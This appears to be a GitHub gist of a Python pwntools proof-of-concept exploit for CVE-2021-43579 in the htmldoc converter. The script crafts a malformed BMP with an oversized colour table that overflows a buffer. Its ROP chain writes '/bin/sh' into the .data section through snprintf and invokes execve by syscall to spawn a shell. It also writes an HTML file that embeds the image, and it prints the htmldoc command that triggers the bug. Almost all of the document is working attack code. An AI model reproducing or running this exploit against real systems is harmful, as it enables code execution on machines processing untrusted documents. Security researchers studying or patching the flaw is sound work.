/CVE-2021-43579.py Secret
Created
May 30, 2023 17:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from pwn import * | |
| import sys | |
| import os | |
| def long(v=0): | |
| return v.to_bytes(4, "little") | |
| def dword(v=0): | |
| return v.to_bytes(4, "little") | |
| def word(v=0): | |
| return v.to_bytes(2, "little") | |
| def getc(v=0): | |
| return v.to_bytes(1, "little") | |
| log.info("Generating corrupted BMP image") | |
| colors_used = 4096 | |
| width = 1 | |
| height = 1 | |
| depth = 1 | |
| header = b"BM" | |
| out = bytearray() | |
| out += dword() | |
| out += word() | |
| out += word() | |
| out += dword() | |
| out += dword(0) # info_size | |
| out += long(width) # width | |
| out += long(height) # height | |
| out += word() | |
| out += word(depth) # depth | |
| out += dword(0) # compression | |
| out += dword(0) | |
| out += long(0) | |
| out += long(0) | |
| out += dword(colors_used) # colors_used | |
| out += dword() | |
| offset = 2920 | |
| binsh_offset = 32 | |
| total = colors_used*4 | |
| filename = "./htmldoc" | |
| elf = ELF(filename) | |
| rop = ROP(filename) | |
| # Gadgets | |
| pop_rdi = rop.find_gadget(["pop rdi","ret"]).address | |
| pop_rsi = rop.find_gadget(["pop rsi","ret"]).address | |
| pop_rdx = rop.find_gadget(["pop rdx","ret"]).address | |
| pop_rcx = rop.find_gadget(["pop rcx","ret"]).address | |
| pop_rax = rop.find_gadget(["pop rax","ret"]).address | |
| ret = rop.find_gadget(["ret"]).address | |
| syscall = rop.find_gadget(["syscall"]).address | |
| data_section_base = elf.get_section_by_name('.data').header.sh_addr | |
| log.info('Creating ropchain for writing "/bin/sh" in data section using snprintf') | |
| char_writer = next(elf.search(b"%c")) # %s | |
| binsh = "/bin/sh" | |
| payload = b"" | |
| for i in range(len(binsh)): | |
| payload += p64(pop_rdi) + p64(data_section_base+i) # rdi = .data | |
| payload += p64(pop_rsi) + p64(2) # rsi = 2 | |
| payload += p64(pop_rdx) + p64(char_writer) # rdx = %c | |
| payload += p64(pop_rcx) + p64(ord(binsh[i])) # rcx = A | |
| payload += p64(pop_rax) + p64(0) # rax = 0 | |
| payload += p64(elf.plt["snprintf"]) | |
| log.info('Creating ropchain to execute /bin/sh using syscall') | |
| # execve(0, "/bin/sh", 0) | |
| payload += p64(pop_rax) + p64(59) # rax = execve | |
| payload += p64(pop_rdi) + p64(data_section_base) # rdi = .data | |
| payload += p64(pop_rsi) + p64(0) # rsi = 0 | |
| payload += p64(pop_rdx) + p64(0) # rdx = 0 | |
| payload += p64(ret) | |
| payload += p64(syscall) | |
| out += b"B" * (offset) + payload + b"D" * (total - offset - len(payload)) | |
| for _ in range(width * height * depth): | |
| out += dword(ord("B")) | |
| with open("poc.bmp", "wb") as f: | |
| f.write(header + out) | |
| log.success("Corrupted BMP image created successfully") | |
| exploit = '<HTML><BODY><P><IMG SRC="./poc.bmp"></A></BODY></HTML>' | |
| with open("poc.html", "w") as f: | |
| f.write(exploit) | |
| log.success("poc.html created successfully") | |
| log.info("Exploit: {} --webpage -f out.pdf ./poc.html".format(filename)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment